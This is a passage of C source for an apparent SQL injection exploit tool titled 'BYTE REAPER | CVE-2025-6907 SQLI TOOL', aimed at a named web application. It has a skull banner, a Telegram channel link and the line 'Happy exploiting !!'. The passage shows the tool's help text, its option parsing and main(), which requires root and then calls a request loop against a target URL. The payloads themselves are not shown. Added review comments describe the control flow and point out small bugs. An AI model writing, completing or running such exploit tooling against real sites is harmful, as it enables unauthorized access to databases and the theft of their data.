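    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1 -r\n\n");
    printf("\e[1;37m\t3- *-i / --input:\n");
    printf("\e[1;37m\t\tTreat the provided URL as a full URI (including query).\n");
    printf("\e[1;37m\t\tUseful for custom endpoints or non-standard paths.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -i [FULL_URL]\n\n");
    printf("\e[1;37m\t4- *-c / --check:\n");
    printf("\e[1;37m\t\tPerform service & environment checks (files, folders, Apache).\n");
    printf("\e[1;37m\t\tVerifies prerequisites before sending payloads.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -c\n\n");
    printf("\e[1;37m\t5- *-v / --verbose:\n");
    printf("\e[1;37m\t\tEnable verbose mode (detailed curl operations & payload mapping).\n");
    printf("\e[1;37m\t\tPrints additional debug info such as payload addresses and curl logs.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1 -v\n\n");
    printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}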
/*
 * Entry point: prints the banner, enforces the root and Linux checks, parses the
 * options and then runs the local checks and/or the request loop in e().
 *
 * Order of operations, as written below:
 *   1. banner
 *   2. runRoot() and checkSystem(), both before any option is parsed, so every mode
 *      including -h requires an effective UID of 0
 *   3. option parsing with the argparse helpers from argparse.h
 *   4. -h prints the help and execution continues
 *   5. -c without a URL runs the local checks and returns 0
 *   6. no -c and no URL prints a usage error and exits
 *   7. otherwise the local checks (if -c), the verbose memory map (if -v), then e(url)
 */
int main(int argc,
const char **argv)
{
printf("\e[1;31m"
"⠀⠀⠀⠀⠀⣶⡆⠀⠀⠀⢀⣴⢦⠀⠀⠀⠀⣖⡶⠀⠀⠀⠀⡏⡧⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢹⣷⡀⠀⠀⢀⣿⣧⡀⠀⠀⢠⣾⣧⠀⠀⠀⣠⣾⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣦⡀⣼⣿⣿⣷⡀⢠⣿⣿⣿⡆⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⠋⠙⢿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠠⣤⣉⣙⠛⠛⠛⠿⠿⠁⣴⣦⡈⠻⠛⠛⠛⢛⣉⣁⡤⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠶⣶⣆⠈⢿⡿⠃⣠⣶⡿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢠⣿⣿⣶⣶⣤⣤⣤⣤⡀⢁⣠⣤⣤⣤⣶⣶⣿⣿⡀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⣸⣿⡏⠉⠙⠛⠿⢿⣿⣿⣾⣿⡿⠿⠛⠋⠉⠹⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠻⢿⣧⣀⠀⠀⣀⣀⣼⡿⣿⣯⣀⣀⠀⠀⣀⣼⡿⠗⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⠁⠘⣿⣿⣿⣿⣿⠟⠉⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣇⣀⣀⣹⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⠿⣿⡿⢿⣿⠿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡇⢀⣿⡇⢸⣿⡀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
);
printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n");
printf("■ \e[1;37m BYTE REAPER | CVE-2025-6907 SQLI TOOL \e[1;31m\n");
printf("■ \e[1;32m Target : CODE_PROJECT \e[1;31m\n");
printf("■ \e[1;34m Channel: https://t.me/exploiterX0 \e[1;31m\n");
printf("\e[0;32m■ -> Happy exploiting !!\n");
printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n\n");
printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
const char *targetUrl = NULL;
int run = 0;
int showH = 0;
/* NOTE(review): yourUse is never read. */
const char *yourUse = NULL;
/* Both gates run before the command line is looked at. */
runRoot();
checkSystem();
/* Option table; each entry binds a flag to the variable whose address is given. */
struct argparse_option options[] =
{
OPT_BOOLEAN('h',
"help",
&showH,
"Show detailed help"),
OPT_STRING('u',
"url",
&targetUrl,
"Enter Target URL"),
OPT_BOOLEAN('r',
"response",
&run,
"This Argument For Show Response Server"),
OPT_STRING('i',
"input",
&inputUrl,
"Enter FULL URL"),
OPT_BOOLEAN('c',
"check",
&runS,
"Argument to check Service CODE_PROJECT and File,Folder,Apache, process..."),
OPT_BOOLEAN(
'v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
/* -i takes precedence over -u and switches e() to "append to the given URL" mode. */
useFullurl = (inputUrl != NULL);
const char *url = inputUrl ? inputUrl : targetUrl;
showResponse = run ;
/* Help does not end the program; the checks below still run afterwards. */
if(showH)
{
showHelp();
}
/* -c alone: local checks only, then a normal return. */
if (runS && !url)
{
checkFile();
checkProccess();
return 0;
}
if (!runS && !url)
{
printf("\e[1;31m\n[-] Please Enter Target URL !\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://192.168.1.100/book_car.php\n");
/*
 * Raw syscall 60 (exit) with status 0.
 * NOTE(review): this bypasses the C library's exit handling, so buffered stdout is
 * not flushed (output can be lost when stdout is not a terminal), and a usage error
 * ends with a success status.
 */
__asm__ volatile
(
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
/* -c together with a URL: local checks first, then the request loop. */
if (runS && url)
{
checkFile();
checkProccess();
}
if (verbose)
{
/* The assignment is redundant; verbose is already non-zero here. */
verbose = 1;
printf("\e[0;34m[+] Verbose Mode Run...\n");
printf("\e[0;34m[+] Show Memory Location Run...\n");
memory();
}
e(url);
return 0;
}